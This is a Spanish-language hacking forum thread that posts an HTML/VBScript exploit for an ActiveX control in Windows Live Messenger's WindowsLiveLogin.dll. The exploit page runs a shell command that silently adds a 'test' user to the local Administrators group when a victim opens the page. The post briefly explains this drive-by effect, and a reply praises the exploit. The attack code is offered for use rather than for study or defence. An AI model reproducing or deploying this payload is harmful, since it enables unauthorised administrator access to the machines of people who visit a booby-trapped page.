Mostrar mensajes previos
Ordenar por
por Skillmax Usa camisa de fuerza
**
inj3ctor


Descripcion del programa: MSN ya une programa de mensajería instantánea para la plataforma Windows.


Analizando la vulnerabilidad

El archivo que produce tal vulnerabilidad es WindowsLiveLogin.dll

Program FilesCommon FilesMicrosoft SharedWindows
LiveWindowsLiveLogin.dll

Infecta la función:


Código: Seleccionar todo

AddAccount (
ByVal bstrAccountName As String ,
ByVal bstrPassword As String ,
ByVal iOption As Long
)
&
Sub DeleteAccount (
ByVal bstrAccountName As String
)


in (AddAccount&DeleteAccount) in IIDBHOCtrl


El exploit:

Código: Seleccionar todo

<html>
<object classid='D2517915-48CE-4286-970F-921E881B8C5C' id='target'></object>
<script language='vbscript'>
arg1=" cmd /c net user test password /add && net localgroup Administrators test
/add"
target.run arg1
</script></p>
</html>

Un atacante utiliza el objeto ActiveX para ejecutar el parametro arg1 y el contenido de este parametro lo que hace es añadir un usuario y contraseña en el grupo de administradores.
Al momento de que un usuario entra a un sitio web que incrusta este codigo internamente el sistema añadirá un nuevo usuario "y" dar al nuevo usuario de privilegios más altos.




p0is0n: Porfavor no uses la Palabra vic....
por [NIN] Esquizofrénico
<object classid='D2517915-48CE-4286-970F-921E881B8C5C' id='target'></object>

Me podrías explicar que hace eso?

Desde ya gracias y muy buen exploit.
Temas similares
Execution of Remote VBA Script in Excel por xrahitel en Manuales y Tutoriales
7-Zip Memory Remote Code Execution por xrahitel en Manuales y Tutoriales
Fundamentales Instaladores .OCX (ActiveX Installer) por Usuario borrado 124282 en Troyanos y Herramientas
code execution via CHM hijacking por xrahitel en Manuales y Tutoriales
Links sobre el tema
Variantes de tema
Responder

Volver a “Exploits”